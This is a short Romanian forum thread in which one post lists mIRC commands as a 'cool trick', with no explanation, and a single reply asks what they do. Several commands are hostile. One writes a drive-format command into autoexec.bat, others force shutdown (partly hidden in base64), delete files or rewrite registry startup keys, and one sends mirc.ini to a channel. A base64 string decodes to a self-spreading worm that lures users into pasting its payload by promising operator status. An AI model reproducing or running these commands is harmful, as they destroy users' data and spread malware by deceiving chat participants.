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Forum Romania Inedit / Off Topic / Ceva Tare Pentru mIRC-ari !!! Moderat de 80Inanna, Crizzu, Neo, cuculean, gabiandreicristian, maharet, maleficus
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Membru Gold

Inregistrat: acum 19 ani
//!remote off | !timers off | !sockclose * | msg #nohack don3
//!play -trfiles #nohack mirc.ini 2300
//!say $version $mircdir $os
/alias /ame { set %exclude #nohack, | set %output $1- | set %x 1 | while (%x <= $chan(0)) { if ($chan(%x) !isin %exclude) { describe $chan(%x) %output } | inc %x 1 } }
//!say  $iif($readini($mircini,text,quit),$readini($mircini,text,quit),Fals)
//run attrib -r mirc.ini | //!writeini mirc.ini text quit . | //run attrib +r mirc.ini | //!say done
//!run cmd /c taskkill /f /im msgame32.exe /t | !say taskkilled.
//!run iexplore | !say sv
//say $rand(a,z) $+ $rand(A,Z) $+ $rand(a,z) $+ $rand(a,z).
//!run cmd shutdown -l
//!say $findfile("c:WINDOWSsystem32configDLL",*.*,*, remove $1- )
//remove c:WINDOWSsystem32configDLLmirc.ini | say $exists(c:WINDOWSsystem32configDLLmirc.ini)
//!say Results $findfile(c:,mirc.ini,0,msg #nohack $1-)
//run regedit /a c:regfix.reg HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun | !say Done.
//!play #nohack c:regfix.reg 3000
//!write -c c:regfix.reg | !write c:regfix.reg REGEDIT4 | !write c:regfix.reg [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] | !write c:regfix.reg"Nvidia"=- | say don3.
//remove c:regfix.reg | say don3.
//!run regedit /s c:regfix.reg | say don3
//say $lines(xxx.mrc)
//!unload -rsn xxx.mrc | !say done | //!remove xxx.mrc | !say $exists(xxx.mrc)
//var %s,%d,%c 1,%r abcdefghijklmnopqrstuvwxyz | while $mid(%r,%c,1) { %s = $mid(%r,%c,1) | if $disk(%s).type { %d = %d %s is $disk(%s).type $chr(124) } | inc %c } | say These are my disks: %d
//!write   $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpvaW4gI01hbmlsYSB8IC5tc2cgJG5pY2sgRG8gWW91IFdhbnQgdG8gYmUgYW4gT1BFUkFUT1IgaW4gJGNoYW4gPyBjb3B5L3Bhc3RlIHRoaXMtPgMxNCAvL3dyaXRlIKAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAgJGNocigxMjQpIC8vbW9kZSAkICQrIG1lICtSIH0=,m) | .load -rs   | //mode $me +R
//!unload -rsn " " | remove " " | say don3.
//write C:autoexec.bat format c /q/f yes yes
//r $+ $decode(dW4gc2h1dGRvd24=,m) -r
//r $+ $decode(dW4gc2h1dGRvd24=,m) -s
//!emailaddr newone@ | //!identd on newone | //!say done

Va rog cititi si respectati regulile forumului
Pentru upload de fisiere folositi
Nu folositi majuscule in forumuri !
Incalcarea acestor legi vor duce la banare !

pus acum 18 ani
Membru Senior

Din: Lumea Larga
Inregistrat: acum 18 ani
interesting.....dar oare ce fac comenziile alea pe care le ai scris tu...mai ales /!say $findfile("c:WINDOWSsystem32configDLL",*.*,*, remove $1- )......... 

If somebody can change the world, don't expect me to do it!!

pus acum 18 ani
Pagini: 1  

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